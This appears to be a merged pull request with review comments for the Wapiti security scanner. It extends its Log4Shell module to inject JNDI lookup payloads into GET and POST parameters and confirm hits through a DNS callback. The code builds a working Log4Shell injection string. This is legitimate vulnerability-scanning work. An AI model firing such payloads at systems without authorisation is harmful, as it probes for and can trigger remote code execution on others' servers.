### PR TITLE
The Log4Shell Attack can now send payloads to the Get and Post parameters

### PR DESCRIPTION
**Pull request by JulienTD**
## Description
The Log4Shell attack has been improved by now sending payloads to query and body parameters.

## Related Issue(s)
N/A

### CODE REVIEW

File: wapitiCore/attack/mod_log4shell.py [hunk 1]
```diff
@@ -102,6 +143,29 @@ async def _get_malicious_headers(self, headers: List[str]) -> Tuple[Dict, Dict]:
...
+        original_request: Request,
+        params: List[Tuple[str, str]],
+    ) -> Tuple[Request, str, uuid.UUID]:
+        for idx in range(0, len(params)):
+            malicious_params = copy.deepcopy(params)
+
+            param_uuid = uuid.uuid4()
+            param_name = malicious_params[idx][0]
+
+            malicious_params[idx][1] = "${jndi:dns://" + f"{self.dns_endpoint}/{param_uuid}" + ".l}"
```
Comment (bretfourbe) [inline wapitiCore/attack/mod_log4shell.py:157]: add a comment to explain why we need to split the string maybe ?

File: wapitiCore/attack/mod_log4shell.py [hunk 2]
```diff
@@ -26,54 +28,94 @@ class ModuleLog4Shell(Attack):
...
+        if not self._verify_dns(str(param_uuid)):
+            return
+        element_type = "query parameter" if request.method == "GET" else "body parameter"
+
+        await self.add_vuln_critical(
+            category=NAME,
+            request=request,
+            info=_("URL {0} seems vulnerable to Log4Shell attack by using the {1} {2}") \
+                .format(request.url, element_type, param_name),
+            parameter=f"{request.get_params if request.method == 'GET' else request.post_params}"
```
Comment (devl00p) [inline wapitiCore/attack/mod_log4shell.py:81]: Why don't you use `param_name` here ?

File: wapitiCore/attack/mod_log4shell.py [hunk 3]
```diff
@@ -26,54 +28,94 @@ class ModuleLog4Shell(Attack):
...
+        log_red(
+            _("URL {0} seems vulnerable to Log4Shell attack by using the {1} {2}"),
+            request.url, element_type, param_name
+        )
+        log_red(request.http_repr())
+        log_red("---")
+
+    async def _verify_headers_vulnerability(
+        self,
+        modified_request:
```
Comment (devl00p) [inline wapitiCore/attack/mod_log4shell.py:94]: Format is a bit strange

File: wapitiCore/attack/mod_log4shell.py [hunk 4]
```diff
@@ -26,54 +28,94 @@ class ModuleLog4Shell(Attack):
...
+                    _("URL {0} seems vulnerable to Log4Shell attack by using the {1} {2}"),
+                    modified_request.url, "header", header
                 )
                 log_red(modified_request.http_repr())
                 log_red("---")
 
-    async def _verify_dns(self, header_uuid: str) -> bool:
+    def _verify_dns(self, header_uuid: str) -> bool:
         resolver = dns.resolver.Resolver(configure=False)
         resolver.nameservers = [socket.gethostbyname(self.dns_endpoint)]
```
Comment (devl00p) [inline wapitiCore/attack/mod_log4shell.py:120]: `gethostbyname` on the `dns_endpoint` should be called only once.

File: wapitiCore/attack/mod_log4shell.py [hunk 5]
```diff
@@ -26,54 +28,94 @@ class ModuleLog4Shell(Attack):
...
-                    _("URL {0} seems vulnerable to Log4Shell attack by using the header {1}"),
-                    modified_request.url, header
+                    _("URL {0} seems vulnerable to Log4Shell attack by using the {1} {2}"),
+                    modified_request.url, "header", header
                 )
                 log_red(modified_request.http_repr())
                 log_red("---")
 
-    async def _verify_dns(self, header_uuid: str) -> bool:
+    def _verify_dns(self, header_uuid: str) -> bool:
```
Comment (devl00p) [inline wapitiCore/attack/mod_log4shell.py:118]: Would be great to make this function async if we plan to speed it a bit later

File: wapitiCore/attack/mod_log4shell.py [hunk 6]
```diff
@@ -96,14 +138,42 @@ async def _get_malicious_headers(self, headers: List[str]) -> Tuple[Dict, Dict]:
...
+                path=original_request.url,
+                method=original_request.method,
+                post_params=malicious_params if original_request.method == "POST" else original_request.post_params,
+                get_params=malicious_params if original_request.method == "GET" else original_request.get_params,
+                referer=original_request.referer,
+                link_depth=original_request.link_depth
+            )
+            yield malicious_request, param_name, param_uuid
+
+    def _generate_payload(self, unique_id: str) -> str:
```
Comment (devl00p) [inline wapitiCore/attack/mod_log4shell.py:170]: `unique_id` type should be `uuid.uuid4` instead ?

**Review by devl00p — CHANGES_REQUESTED** [review]

File: wapitiCore/attack/mod_log4shell.py (hunk 2 above)
Comment (JulienTD) [reply wapitiCore/attack/mod_log4shell.py:81]: We wanted to show the full payload to the user. If we replace this with the `param_name`
 where can we write it? @bretfourbe

File: wapitiCore/attack/mod_log4shell.py (hunk 3 above)
Comment (JulienTD) [reply wapitiCore/attack/mod_log4shell.py:94]: Fixed

File: wapitiCore/attack/mod_log4shell.py (hunk 4 above)
Comment (JulienTD) [reply wapitiCore/attack/mod_log4shell.py:120]: Fixed

File: wapitiCore/attack/mod_log4shell.py (hunk 5 above)
Comment (JulienTD) [reply wapitiCore/attack/mod_log4shell.py:118]: Fixed

File: wapitiCore/attack/mod_log4shell.py (hunk 6 above)
Comment (JulienTD) [reply wapitiCore/attack/mod_log4shell.py:170]: Fixed

File: wapitiCore/attack/mod_log4shell.py (hunk 2 above)
Comment (devl00p) [reply wapitiCore/attack/mod_log4shell.py:83]: If I'm not wrong the payload will appear in the report as the `request` object is dumped using `http_repr`

Comment (JulienTD) [reply wapitiCore/attack/mod_log4shell.py:83]: Yes that's true, I'm modifying it

**Review by devl00p — APPROVED** [review]

**Pull request merged**